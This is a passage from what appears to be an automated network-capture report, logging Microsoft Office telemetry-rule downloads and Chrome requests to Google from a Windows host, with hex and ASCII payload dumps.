xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.5	49749	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:28 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:28 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:28 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 7dbe6cd5-601e-00ab-1ca2-3466f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193928Z-r178fb8d765tllwdhC1DFWaz8400000001mg00000000bdmq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:28 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.5	49748	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:28 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:28 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:28 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 06b7c879-901e-00a0-36a3-346a6d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193928Z-r178fb8d765hbcjvhC1DFW50zc00000001fg00000000e0d0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:28 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.5	49750	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:28 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:28 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:28 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193928Z-16547b76f7fwvr5dhC1DFW2c940000000hd000000000wd5e x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:28 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49754	142.250.186.164	443	7416	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:29 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-13 19:39:29 UTC	1266	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:29 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-xVgUNEjgYn_fdosW2DPYGQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-13 19:39:29 UTC	112	IN	Data Raw: 33 31 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 76 65 72 69 7a 6f 6e 20 66 69 6f 73 20 69 6e 74 65 72 6e 65 74 20 6f 75 74 61 67 65 73 22 2c 22 62 6c 61 63 6b 20 70 61 6e 74 68 65 72 20 33 20 64 65 6e 7a 65 6c 20 77 61 73 68 69 6e 67 74 6f 6e 22 2c 22 6d 69 6e 6e 65 73 6f 74 61 20 74 69 6d 62 65 72 77 6f 6c 76 65 73 20 76 73 20 74 72 Data Ascii: 31a)]}'["",["verizon fios internet outages","black panther 3 denzel washington","minnesota timberwolves vs tr
2024-11-13 19:39:29 UTC	689	IN	Data Raw: 61 69 6c 20 62 6c 61 7a 65 72 73 22 2c 22 61 67 65 6e 74 20 62 6f 6f 74 63 61 6d 70 20 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 72 65 77 61 72 64 73 22 2c 22 63 6f 6c 64 20 66 72 6f 6e 74 20 74 65 78 61 73 22 2c 22 6e 6f 76 65 6d 62 65 72 20 66 75 6c 6c 20 6d 6f 6f 6e 22 2c 22 68 61 6e 6e 61 66 6f 72 64 20 63 79 62 65 72 73 65 63 75 72 69 74 79 22 2c 22 68 65 6c 6c 6f 20 6b 69 74 74 79 20 67 75 69 74 61 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 Data Ascii: ail blazers","agent bootcamp monopoly go rewards","cold front texas","november full moon","hannaford cybersecurity","hello kitty guitars"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmR
2024-11-13 19:39:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49755	142.250.186.164	443	7416	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:29 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-13 19:39:29 UTC	1042	IN	HTTP/1.1 200 OK Version: 694010790 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 13 Nov 2024 19:39:29 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-13 19:39:29 UTC	25	IN	Data Raw: 31 33 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 7d 7d 0d 0a Data Ascii: 13)]}'{"ddljson":{}}
2024-11-13 19:39:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	49759	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:29 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:29 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:29 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 231ce337-901e-0083-5701-2dbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193929Z-16547b76f7fknvdnhC1DFWxnys0000000hg000000001083d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:29 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49757	142.250.186.164	443	7416	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:29 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-13 19:39:29 UTC	1042	IN	HTTP/1.1 200 OK Version: 694010790 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 13 Nov 2024 19:39:29 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-13 19:39:29 UTC	336	IN	Data Raw: 32 61 32 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2a24)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-13 19:39:29 UTC	1378	IN	Data Raw: 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 Data Ascii: gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
2024-11-13 19:39:29 UTC	1378	IN	Data Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\
2024-11-13 19:39:29 UTC	1378	IN	Data Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 Data Ascii: role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l22
2024-11-13 19:39:29 UTC	1378	IN	Data Raw: 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 Data Ascii: 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1
2024-11-13 19:39:29 UTC	1378	IN	Data Raw: 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 37 38 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 31 34 32 30 36 36 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 Data Ascii: ft_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700278,3700949,3701384,101420669],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_acce
2024-11-13 19:39:29 UTC	1378	IN	Data Raw: 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 4c 64 3b 5f 2e 4a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 